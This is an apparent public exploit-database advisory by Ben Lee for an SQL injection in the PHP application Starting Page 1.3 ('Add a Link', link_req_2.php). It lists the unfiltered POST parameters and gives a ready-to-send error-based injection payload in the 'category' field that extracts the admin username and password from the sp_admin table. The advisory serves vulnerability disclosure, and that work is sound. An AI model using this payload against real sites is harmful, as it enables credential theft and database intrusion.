Starting Page 1.3 - 'category' SQL Injection

EDB-ID:

41009

CVE:

N/A


Author:

Ben Lee

Type:

webapps


Platform:

PHP

Date:

2017-01-11


# Exploit Title: Starting Page 1.3 "Add a Link" - SQL Injection
# Date: 11-01-2017
# Software Link: http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11<http://software.friendsinwar.com/downloads.php?cat_id=2&download_id=11>
# Exploit Author: Ben Lee
# Contact: benlee9@outlook.com
# Category: webapps

# Tested on: Win7


1. Description


The vulnerable file is "link_req_2.php",all the post parameters do not get filtered,then do sql query。


2. Vulnerable parameters:


'$_POST[category]','$_POST[name]','$_POST[url]','$_POST[description]','$_POST[email]'


3.Proof of Concept:


Url:http://www.example.com/StartingPage/link_req_2.php


Post data:


[category=1' AND (select 1 from(select count(*),concat((select(select(select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e)from sp_admin limit 0,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND 'a'='a&name=abc&email=admin@admin.com&url=www.xxx.com&description=helloworld]


[cid:4be0cc87-4612-4096-ad49-cc18d8cb4033]


Best Regards!
Ben Lee